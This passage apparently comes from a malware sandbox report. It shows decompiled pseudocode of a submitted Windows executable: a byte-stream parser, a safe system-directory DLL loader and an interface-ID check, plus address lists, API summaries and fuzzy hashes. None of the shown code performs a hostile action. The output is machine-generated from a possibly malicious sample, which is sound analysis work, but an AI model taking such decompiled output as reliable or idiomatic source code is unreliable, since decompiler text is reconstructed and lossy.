									_t373 = 0;
									__eflags = 0;
									continue;
								} else {
									goto L63;
								}
							}
						} else {
							goto L6;
						}
						while(1) {
							L6:
							_t361 =  *((intOrPtr*)(_t443 - 0x28));
							_t408 = _t361;
							_t322 = E0040E9B4(_t361);
							 *(_t443 + 0xb) = _t322;
							if((_t322 & 0x000000c0) != 0) {
								break;
							}
							_t333 = _t322 & 0x0000000f;
							 *(_t443 - 0x20) = _t333;
							if(_t333 > 8) {
								L72:
								_push(0x41de18);
								_push(_t443 + 0xf);
								L00418E02();
								goto L73;
							} else {
								if( *(_t443 - 0x20) >  *((intOrPtr*)(_t361 + 4)) -  *((intOrPtr*)(_t361 + 8))) {
									E0040E966(_t408);
								}
								_t337 =  *_t361 +  *((intOrPtr*)(_t361 + 8));
								 *((intOrPtr*)(_t443 - 0x40)) = _t337;
								 *(_t443 - 0x48) = 0;
								 *(_t443 - 0x44) = 0;
								 *(_t443 - 0x24) = 0;
								if( *(_t443 - 0x20) <= 0) {
									L15:
									 *((intOrPtr*)(_t361 + 8)) =  *((intOrPtr*)(_t361 + 8)) +  *(_t443 - 0x20);
									if( *((intOrPtr*)(_t436 + 0x50)) < 0x80) {
										E00410B9E(_t436 + 0x4c,  *(_t443 - 0x48),  *(_t443 - 0x44));
									}
									_t460 =  *(_t443 + 0xb) & 0x00000010;
									 *(_t443 - 0x24) = 1;
									if(( *(_t443 + 0xb) & 0x00000010) == 0) {
										L20:
										 *(_t443 - 0x14) =  *(_t443 - 0x14) +  *(_t443 - 0x24);
										if( *(_t443 - 0x14) > 0x40) {
											goto L75;
										}
										_t464 =  *(_t443 + 0xb) & 0x00000020;
										if(( *(_t443 + 0xb) & 0x00000020) != 0) {
											_t342 = E0040EB3D(_t361, _t431, _t464);
											 *(_t443 + 8) = _t342;
											_t414 =  *((intOrPtr*)(_t361 + 4)) -  *((intOrPtr*)(_t361 + 8));
											if(_t342 >  *((intOrPtr*)(_t361 + 4)) -  *((intOrPtr*)(_t361 + 8))) {
												E0040E966(_t414);
												_t342 =  *(_t443 + 8);
											}
											if( *(_t443 - 0x48) != 0x21 ||  *(_t443 - 0x44) != 0) {
												__eflags =  *(_t443 - 0x48) - 0x30101;
												if( *(_t443 - 0x48) == 0x30101) {
													__eflags =  *(_t443 - 0x44);
													if( *(_t443 - 0x44) == 0) {
														__eflags = _t342 - 5;
														if(_t342 == 5) {
															_t415 =  *((intOrPtr*)(_t441 + 0x38));
															_t431 =  *(_t415 + 8);
															_t417 =  *((intOrPtr*)(_t431 +  *_t415 + 1));
															__eflags =  *((intOrPtr*)(_t436 + 0x48)) - _t417;
															if( *((intOrPtr*)(_t436 + 0x48)) < _t417) {
																 *((intOrPtr*)(_t436 + 0x48)) = _t417;
															}
														}
													}
												}
											} else {
												if(_t342 == 1) {
													_t418 =  *((intOrPtr*)(_t441 + 0x38));
													_t431 =  *(_t418 + 8);
													_t420 =  *((intOrPtr*)(_t431 +  *_t418));
													if( *((intOrPtr*)(_t436 + 0x44)) < _t420) {
														 *((char*)(_t436 + 0x44)) = _t420;
													}
												}
											}
											 *((intOrPtr*)(_t361 + 8)) =  *((intOrPtr*)(_t361 + 8)) + _t342;
										}
										 *(_t443 - 0x38) =  *(_t443 - 0x38) + 1;
										if( *(_t443 - 0x38) <  *(_t443 - 0x10)) {
											continue;
										} else {
											_t285 =  *(_t443 - 0x10);
											goto L37;
										}
									} else {
										_t344 = E0040EB3D(_t361, _t431, _t460);
										_t461 = _t344 - 0x40;
										 *(_t443 - 0x24) = _t344;
										if(_t344 > 0x40) {
											L73:
											_push(0x41de18);
											_push(_t443 + 0xf);
											L00418E02();
											L74:
											_push(0x41de18);
											_push(_t443 + 0xf);
											L00418E02();
											L75:
											_push(0x41de18);
											_push(_t443 + 0xf);
											L00418E02();
											goto L76;
										}
										if(E0040EB3D(_t361, _t431, _t461) != 1) {
											goto L74;
										}
										goto L20;
									}
								} else {
									while(1) {
										asm("cdq");
										_t364 = _t431;
										_t431 =  *(_t443 - 0x44);
										_t425 = 8;
										_t349 = E004190E0( *(_t443 - 0x48), _t425, _t431);
										 *(_t443 - 0x24) =  *(_t443 - 0x24) + 1;
										 *(_t443 - 0x48) =  *( *(_t443 - 0x24) + _t337) & 0x000000ff | _t349;
										 *(_t443 - 0x44) = _t364 | _t431;
										if( *(_t443 - 0x24) >=  *(_t443 - 0x20)) {
											break;
										}
										_t337 =  *((intOrPtr*)(_t443 - 0x40));
									}
									_t436 =  *((intOrPtr*)(_t443 + 0xc));
									_t361 =  *((intOrPtr*)(_t443 - 0x28));
									goto L15;
								}
							}
						}
						_push(0x41de18);
						_push(_t443 + 0xf);
						L00418E02();
						goto L72;
					}
					_push(0x41de18);
					_push(_t443 + 0xf);
					L00418E02();
					L82:
					E0040EA33( *((intOrPtr*)(_t441 + 0x38)), _t431);
					while(1) {
						L67:
						_t278 = E0040EA46( *((intOrPtr*)(_t441 + 0x38)));
						if((_t278 | _t431) == 0) {
							break;
						}
						if(_t278 != 0xa || _t431 != 0) {
							goto L82;
						} else {
							E0040F1EC(_t441, _t431,  *((intOrPtr*)(_t443 - 0x18)), _t436 + 0xc);
							continue;
						}
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t443 - 0xc));
					return _t278;
				}
			}














































                                                                                                                            0x0040f313
                                                                                                                            0x0040f321
                                                                                                                            0x0040f325
                                                                                                                            0x0040f32d
                                                                                                                            0x0040f332
                                                                                                                            0x0040f336
                                                                                                                            0x0040f33a
                                                                                                                            0x0040f33d
                                                                                                                            0x0040f346
                                                                                                                            0x0040f34a
                                                                                                                            0x0040f352
                                                                                                                            0x0040f35b
                                                                                                                            0x0040f360
                                                                                                                            0x0040f365
                                                                                                                            0x0040f368
                                                                                                                            0x0040f373
                                                                                                                            0x0040f380
                                                                                                                            0x0040f38d
                                                                                                                            0x0040f392
                                                                                                                            0x0040f394
                                                                                                                            0x0040f397
                                                                                                                            0x0040f39a
                                                                                                                            0x0040f39d
                                                                                                                            0x0040f3a0
                                                                                                                            0x0040f3a3
                                                                                                                            0x0040f3a9
                                                                                                                            0x0040f3ac
                                                                                                                            0x0040f3b0
                                                                                                                            0x0040f3b3
                                                                                                                            0x0040f3b6
                                                                                                                            0x0040f3b9
                                                                                                                            0x0040f6bd
                                                                                                                            0x0040f6cc
                                                                                                                            0x0040f6d1
                                                                                                                            0x0040f6d5
                                                                                                                            0x0040f6de
                                                                                                                            0x0040f6ea
                                                                                                                            0x0040f6ef
                                                                                                                            0x0040f6f5
                                                                                                                            0x0040f6fa
                                                                                                                            0x0040f6fc
                                                                                                                            0x0040f705
                                                                                                                            0x0040f70a
                                                                                                                            0x0040f718
                                                                                                                            0x0040f71d
                                                                                                                            0x0040f726
                                                                                                                            0x0040f72b
                                                                                                                            0x0040f732
                                                                                                                            0x0040f73d
                                                                                                                            0x0040f745
                                                                                                                            0x0040f747
                                                                                                                            0x0040f74a
                                                                                                                            0x0040f74f
                                                                                                                            0x0040f752
                                                                                                                            0x0040f755
                                                                                                                            0x0040f759
                                                                                                                            0x0040f759
                                                                                                                            0x0040f747
                                                                                                                            0x00000000
                                                                                                                            0x0040f3bf
                                                                                                                            0x0040f3c6
                                                                                                                            0x0040f3c9
                                                                                                                            0x0040f3cc
                                                                                                                            0x0040f3da
                                                                                                                            0x0040f3df
                                                                                                                            0x0040f3e2
                                                                                                                            0x0040f3e9
                                                                                                                            0x0040f3ec
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f3fb
                                                                                                                            0x0040f401
                                                                                                                            0x0040f58e
                                                                                                                            0x0040f576
                                                                                                                            0x0040f578
                                                                                                                            0x0040f57b
                                                                                                                            0x0040f593
                                                                                                                            0x0040f597
                                                                                                                            0x0040f599
                                                                                                                            0x0040f7f6
                                                                                                                            0x0040f7f9
                                                                                                                            0x0040f804
                                                                                                                            0x0040f805
                                                                                                                            0x0040f80a
                                                                                                                            0x0040f80d
                                                                                                                            0x0040f818
                                                                                                                            0x0040f819
                                                                                                                            0x0040f81e
                                                                                                                            0x0040f821
                                                                                                                            0x0040f82c
                                                                                                                            0x0040f82d
                                                                                                                            0x0040f832
                                                                                                                            0x0040f835
                                                                                                                            0x0040f840
                                                                                                                            0x0040f841
                                                                                                                            0x0040f846
                                                                                                                            0x0040f849
                                                                                                                            0x0040f854
                                                                                                                            0x0040f855
                                                                                                                            0x00000000
                                                                                                                            0x0040f855
                                                                                                                            0x0040f5a2
                                                                                                                            0x0040f5a7
                                                                                                                            0x0040f5ad
                                                                                                                            0x0040f5b5
                                                                                                                            0x0040f5ba
                                                                                                                            0x0040f5bc
                                                                                                                            0x0040f60f
                                                                                                                            0x0040f616
                                                                                                                            0x0040f618
                                                                                                                            0x0040f61b
                                                                                                                            0x0040f61e
                                                                                                                            0x0040f654
                                                                                                                            0x0040f654
                                                                                                                            0x0040f656
                                                                                                                            0x0040f659
                                                                                                                            0x0040f672
                                                                                                                            0x0040f672
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f65b
                                                                                                                            0x0040f65b
                                                                                                                            0x0040f65b
                                                                                                                            0x0040f65e
                                                                                                                            0x0040f662
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f664
                                                                                                                            0x0040f665
                                                                                                                            0x0040f668
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f66f
                                                                                                                            0x0040f66f
                                                                                                                            0x00000000
                                                                                                                            0x0040f66f
                                                                                                                            0x0040f66c
                                                                                                                            0x00000000
                                                                                                                            0x0040f66c
                                                                                                                            0x0040f620
                                                                                                                            0x0040f624
                                                                                                                            0x0040f626
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f628
                                                                                                                            0x0040f628
                                                                                                                            0x0040f62a
                                                                                                                            0x0040f62f
                                                                                                                            0x0040f632
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f63b
                                                                                                                            0x0040f63d
                                                                                                                            0x0040f640
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f646
                                                                                                                            0x0040f649
                                                                                                                            0x0040f64f
                                                                                                                            0x0040f652
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f652
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f5be
                                                                                                                            0x0040f5be
                                                                                                                            0x0040f5c1
                                                                                                                            0x0040f5c6
                                                                                                                            0x0040f5c9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f5d2
                                                                                                                            0x0040f5d4
                                                                                                                            0x0040f5d7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f5dd
                                                                                                                            0x0040f5e3
                                                                                                                            0x0040f5e8
                                                                                                                            0x0040f5eb
                                                                                                                            0x0040f5ed
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f5f3
                                                                                                                            0x0040f5f6
                                                                                                                            0x0040f5f8
                                                                                                                            0x0040f5fb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f601
                                                                                                                            0x0040f604
                                                                                                                            0x0040f60a
                                                                                                                            0x0040f60d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f60d
                                                                                                                            0x00000000
                                                                                                                            0x0040f582
                                                                                                                            0x0040f582
                                                                                                                            0x0040f586
                                                                                                                            0x0040f678
                                                                                                                            0x0040f67b
                                                                                                                            0x0040f67e
                                                                                                                            0x0040f681
                                                                                                                            0x0040f687
                                                                                                                            0x0040f68a
                                                                                                                            0x0040f690
                                                                                                                            0x0040f69a
                                                                                                                            0x0040f69c
                                                                                                                            0x0040f69c
                                                                                                                            0x0040f6a7
                                                                                                                            0x0040f6ad
                                                                                                                            0x0040f6b0
                                                                                                                            0x0040f6b4
                                                                                                                            0x0040f6b7
                                                                                                                            0x0040f3c1
                                                                                                                            0x0040f3c4
                                                                                                                            0x0040f3c4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f6b7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f407
                                                                                                                            0x0040f407
                                                                                                                            0x0040f407
                                                                                                                            0x0040f40a
                                                                                                                            0x0040f40c
                                                                                                                            0x0040f413
                                                                                                                            0x0040f416
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f41c
                                                                                                                            0x0040f422
                                                                                                                            0x0040f425
                                                                                                                            0x0040f7a6
                                                                                                                            0x0040f7a9
                                                                                                                            0x0040f7b4
                                                                                                                            0x0040f7b5
                                                                                                                            0x00000000
                                                                                                                            0x0040f42b
                                                                                                                            0x0040f434
                                                                                                                            0x0040f436
                                                                                                                            0x0040f436
                                                                                                                            0x0040f440
                                                                                                                            0x0040f447
                                                                                                                            0x0040f44a
                                                                                                                            0x0040f44d
                                                                                                                            0x0040f450
                                                                                                                            0x0040f453
                                                                                                                            0x0040f48f
                                                                                                                            0x0040f497
                                                                                                                            0x0040f4a1
                                                                                                                            0x0040f4ac
                                                                                                                            0x0040f4ac
                                                                                                                            0x0040f4b1
                                                                                                                            0x0040f4b5
                                                                                                                            0x0040f4bc
                                                                                                                            0x0040f4e1
                                                                                                                            0x0040f4e4
                                                                                                                            0x0040f4eb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f4f1
                                                                                                                            0x0040f4f5
                                                                                                                            0x0040f4f9
                                                                                                                            0x0040f501
                                                                                                                            0x0040f504
                                                                                                                            0x0040f509
                                                                                                                            0x0040f50b
                                                                                                                            0x0040f510
                                                                                                                            0x0040f510
                                                                                                                            0x0040f517
                                                                                                                            0x0040f539
                                                                                                                            0x0040f540
                                                                                                                            0x0040f542
                                                                                                                            0x0040f546
                                                                                                                            0x0040f548
                                                                                                                            0x0040f54b
                                                                                                                            0x0040f54d
                                                                                                                            0x0040f550
                                                                                                                            0x0040f555
                                                                                                                            0x0040f559
                                                                                                                            0x0040f55c
                                                                                                                            0x0040f55e
                                                                                                                            0x0040f55e
                                                                                                                            0x0040f55c
                                                                                                                            0x0040f54b
                                                                                                                            0x0040f546
                                                                                                                            0x0040f51f
                                                                                                                            0x0040f522
                                                                                                                            0x0040f524
                                                                                                                            0x0040f527
                                                                                                                            0x0040f52c
                                                                                                                            0x0040f532
                                                                                                                            0x0040f534
                                                                                                                            0x0040f534
                                                                                                                            0x0040f532
                                                                                                                            0x0040f522
                                                                                                                            0x0040f561
                                                                                                                            0x0040f561
                                                                                                                            0x0040f564
                                                                                                                            0x0040f56d
                                                                                                                            0x00000000
                                                                                                                            0x0040f573
                                                                                                                            0x0040f573
                                                                                                                            0x00000000
                                                                                                                            0x0040f573
                                                                                                                            0x0040f4be
                                                                                                                            0x0040f4c0
                                                                                                                            0x0040f4c5
                                                                                                                            0x0040f4c8
                                                                                                                            0x0040f4cb
                                                                                                                            0x0040f7ba
                                                                                                                            0x0040f7bd
                                                                                                                            0x0040f7c8
                                                                                                                            0x0040f7c9
                                                                                                                            0x0040f7ce
                                                                                                                            0x0040f7d1
                                                                                                                            0x0040f7dc
                                                                                                                            0x0040f7dd
                                                                                                                            0x0040f7e2
                                                                                                                            0x0040f7e5
                                                                                                                            0x0040f7f0
                                                                                                                            0x0040f7f1
                                                                                                                            0x00000000
                                                                                                                            0x0040f7f1
                                                                                                                            0x0040f4db
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f4db
                                                                                                                            0x0040f455
                                                                                                                            0x0040f45a
                                                                                                                            0x0040f463
                                                                                                                            0x0040f469
                                                                                                                            0x0040f46b
                                                                                                                            0x0040f46e
                                                                                                                            0x0040f46f
                                                                                                                            0x0040f478
                                                                                                                            0x0040f47b
                                                                                                                            0x0040f481
                                                                                                                            0x0040f487
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f457
                                                                                                                            0x0040f457
                                                                                                                            0x0040f489
                                                                                                                            0x0040f48c
                                                                                                                            0x00000000
                                                                                                                            0x0040f48c
                                                                                                                            0x0040f453
                                                                                                                            0x0040f425
                                                                                                                            0x0040f795
                                                                                                                            0x0040f7a0
                                                                                                                            0x0040f7a1
                                                                                                                            0x00000000
                                                                                                                            0x0040f7a1
                                                                                                                            0x0040f85d
                                                                                                                            0x0040f868
                                                                                                                            0x0040f869
                                                                                                                            0x0040f86e
                                                                                                                            0x0040f871
                                                                                                                            0x0040f75f
                                                                                                                            0x0040f75f
                                                                                                                            0x0040f762
                                                                                                                            0x0040f76b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f774
                                                                                                                            0x00000000
                                                                                                                            0x0040f782
                                                                                                                            0x0040f78b
                                                                                                                            0x00000000
                                                                                                                            0x0040f78b
                                                                                                                            0x0040f774
                                                                                                                            0x0040f881
                                                                                                                            0x0040f889
                                                                                                                            0x0040f889

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040F313
                                                                                                                              • Part of subcall function 0040EB3D: _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EB60
                                                                                                                            • memcpy.MSVCRT ref: 0040F705
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7A1
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7B5
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7C9
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7DD
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F7F1
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F805
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F819
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F82D
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F841
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F855
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F869
                                                                                                                              • Part of subcall function 0040E966: _CxxThrowException.MSVCRT(?,0041DDD8), ref: 0040E979
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionThrow$H_prologmemcpy
                                                                                                                            • String ID: $!$@
                                                                                                                            • API String ID: 3273695820-2517134481
                                                                                                                            • Opcode ID: 009ab704528832d8b16fb1e058230fc7f2265cacff4db05c787c47a6afb7277e
                                                                                                                            • Instruction ID: a27f184481075ffe3955191de69d9ea92fdf604195ce2ec282d718430c25bf8c
                                                                                                                            • Opcode Fuzzy Hash: 009ab704528832d8b16fb1e058230fc7f2265cacff4db05c787c47a6afb7277e
                                                                                                                            • Instruction Fuzzy Hash: A5127074A01249EFCF24DFA5C5819EDBBB1BF09304F10847EE845AB792C738A995CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004143E0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 81librarystringloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 84%
                                                                                                                            			E004143E0() {
				_Unknown_base(*)()* _t24;
				signed int _t25;
				intOrPtr _t26;
				struct HINSTANCE__* _t29;
				intOrPtr _t30;
				short* _t39;
				intOrPtr* _t46;
				signed int _t47;
				void* _t48;

				 *((intOrPtr*)(_t48 + 0xc)) = 0x114;
				if(GetVersionExW(_t48 + 4) == 0 ||  *((intOrPtr*)(_t48 + 0xc)) != 6 ||  *((intOrPtr*)(_t48 + 0x10)) != 0) {
					_t24 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetDefaultDllDirectories");
					if(_t24 == 0) {
						goto L5;
					} else {
						_t25 =  *_t24(0xc00);
						if(_t25 == 0) {
							goto L5;
						}
					}
				} else {
					L5:
					_t25 = GetSystemDirectoryW(_t48 + 0x11c, 0x106);
					if(_t25 != 0 && _t25 <= 0x104) {
						_t25 = lstrlenW(_t48 + 0x11c);
						_t47 = _t25;
						if( *((short*)(_t48 + 0x11a + _t47 * 2)) != 0x5c) {
							 *((short*)(_t48 + 0x11c + _t47 * 2)) = 0x5c;
							_t47 = _t47 + 1;
						}
						_t46 =  *0x41c1cc; // 0x41c1d0
						if( *_t46 != 0) {
							do {
								_t26 =  *_t46;
								_t46 = _t46 + 1;
								 *((short*)(_t48 + 0x124 + _t47 * 2)) = 0;
								if(_t26 == 0) {
									goto L14;
								}
								_t39 = _t48 + 0x126 + _t47 * 2;
								do {
									_t30 =  *_t46;
									_t46 = _t46 + 1;
									 *_t39 = 0;
									_t39 = _t39 + 2;
								} while (_t30 != 0);
								L14:
								lstrcatW(_t48 + 0x124, L".dll");
								_t29 = LoadLibraryExW(_t48 + 0x124, 0, 8);
							} while ( *_t46 != 0);
							return _t29;
						}
					}
				}
				return _t25;
			}












                                                                                                                            0x004143ed
                                                                                                                            0x004143fd
                                                                                                                            0x0041441f
                                                                                                                            0x00414427
                                                                                                                            0x00000000
                                                                                                                            0x00414429
                                                                                                                            0x0041442e
                                                                                                                            0x00414432
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00414432
                                                                                                                            0x00414438
                                                                                                                            0x00414438
                                                                                                                            0x00414445
                                                                                                                            0x0041444d
                                                                                                                            0x00414466
                                                                                                                            0x0041446c
                                                                                                                            0x00414477
                                                                                                                            0x00414479
                                                                                                                            0x00414483
                                                                                                                            0x00414483
                                                                                                                            0x00414484
                                                                                                                            0x0041448d
                                                                                                                            0x0041449d
                                                                                                                            0x0041449d
                                                                                                                            0x004144a2
                                                                                                                            0x004144a7
                                                                                                                            0x004144af
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004144b1
                                                                                                                            0x004144b8
                                                                                                                            0x004144b8
                                                                                                                            0x004144bf
                                                                                                                            0x004144c0
                                                                                                                            0x004144c3
                                                                                                                            0x004144c6
                                                                                                                            0x004144ca
                                                                                                                            0x004144d7
                                                                                                                            0x004144e5
                                                                                                                            0x004144e7
                                                                                                                            0x00000000
                                                                                                                            0x004144ed
                                                                                                                            0x0041448d
                                                                                                                            0x0041444d
                                                                                                                            0x004144f6

                                                                                                                            APIs
                                                                                                                            • GetVersionExW.KERNEL32 ref: 004143F5
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,SetDefaultDllDirectories), ref: 00414418
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041441F
                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000106), ref: 00414445
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00414466
                                                                                                                            • lstrcatW.KERNEL32(?,.dll), ref: 004144D7
                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,00000000), ref: 004144E5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemVersionlstrcatlstrlen
                                                                                                                            • String ID: .dll$SetDefaultDllDirectories$\$\$kernel32.dll
                                                                                                                            • API String ID: 532070074-471922092
                                                                                                                            • Opcode ID: ae18c3a299c0fc34f521af23ecae2155342ef2f81c69c2ab57d08f5bd9fad663
                                                                                                                            • Instruction ID: d987fb0205f110b4e88cb17dd8f0118f17295e0edb0f928e64eab48f7225754e
                                                                                                                            • Opcode Fuzzy Hash: ae18c3a299c0fc34f521af23ecae2155342ef2f81c69c2ab57d08f5bd9fad663
                                                                                                                            • Instruction Fuzzy Hash: 46219E312443049BD7349B609C44BD777E8AB98710F10882EE68593290E77CD585CBA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406C96 Relevance: 13.9, APIs: 11, Instructions: 150COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 52%
                                                                                                                            			E00406C96(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t27;
				signed int _t30;
				intOrPtr* _t33;
				void* _t34;
				void* _t35;
				void* _t37;
				signed int _t38;
				signed int* _t40;
				intOrPtr _t41;
				signed int _t42;

				_t41 = _a8;
				_t40 = _a12;
				_t35 = 0x10;
				 *_t40 =  *_t40 & 0x00000000;
				_push(_t35);
				_push(0x41c24c);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					L1:
					_t42 = _a4;
					 *_t40 = _t42;
					L24:
					 *((intOrPtr*)(_t42 + 0x28)) =  *((intOrPtr*)(_t42 + 0x28)) + 1;
					return 0;
				}
				_push(_t35);
				_push(0x41b320);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					goto L1;
				}
				_push(_t35);
				_push(0x41b280);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 4;
					L23:
					asm("sbb eax, eax");
					 *_t40 =  ~_t30 & _t38;
					goto L24;
				}
				_push(_t35);
				_push(0x41b260);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 8;
					goto L23;
				}
				_push(_t35);
				_push(0x41b2a0);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 0xc;
					goto L23;
				}
				_push(_t35);
				_push(0x41b3b0);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 0x10;
					goto L23;
				}
				_push(_t35);
				_push(0x41b290);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 0x14;
					goto L23;
				}
				_push(_t35);
				_push(0x41b3a0);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 0x18;
					goto L23;
				}
				_push(_t35);
				_push(0x41b360);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 0x1c;
					goto L23;
				}
				_push(_t35);
				_push(0x41b270);
				_push(_t41);
				L00418DA0();
				if(_t27 == 0) {
					_t42 = _a4;
					_t30 = _t42;
					_t38 = _t42 + 0x20;
					goto L23;
				}
				_push(_t35);
				_push(0x41b300);
				_push(_t41);
				L00418DA0();
				if(_t27 != 0) {
					return 0x80004002;
				}
				_t42 = _a4;
				_t37 = _t42 + 0x64;
				if( *((intOrPtr*)(_t42 + 0x64)) != _t27) {
					L22:
					_t30 = _t42;
					_t38 = _t42 + 0x24;
					goto L23;
				}
				_t33 =  *((intOrPtr*)(_t42 + 0x68));
				_t34 =  *((intOrPtr*)( *_t33))(_t33, 0x41b300, _t37);
				if(_t34 == 0) {
					goto L22;
				}
				return _t34;
			}













                                                                                                                            0x00406c9b
                                                                                                                            0x00406c9f
                                                                                                                            0x00406ca4
                                                                                                                            0x00406ca5
                                                                                                                            0x00406ca8
                                                                                                                            0x00406ca9
                                                                                                                            0x00406cae
                                                                                                                            0x00406caf
                                                                                                                            0x00406cb9
                                                                                                                            0x00406cbb
                                                                                                                            0x00406cbb
                                                                                                                            0x00406cbe
                                                                                                                            0x00406e09
                                                                                                                            0x00406e09
                                                                                                                            0x00000000
                                                                                                                            0x00406e0c
                                                                                                                            0x00406cc5
                                                                                                                            0x00406cc6
                                                                                                                            0x00406ccb
                                                                                                                            0x00406ccc
                                                                                                                            0x00406cd6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406cd8
                                                                                                                            0x00406cd9
                                                                                                                            0x00406cde
                                                                                                                            0x00406cdf
                                                                                                                            0x00406ce9
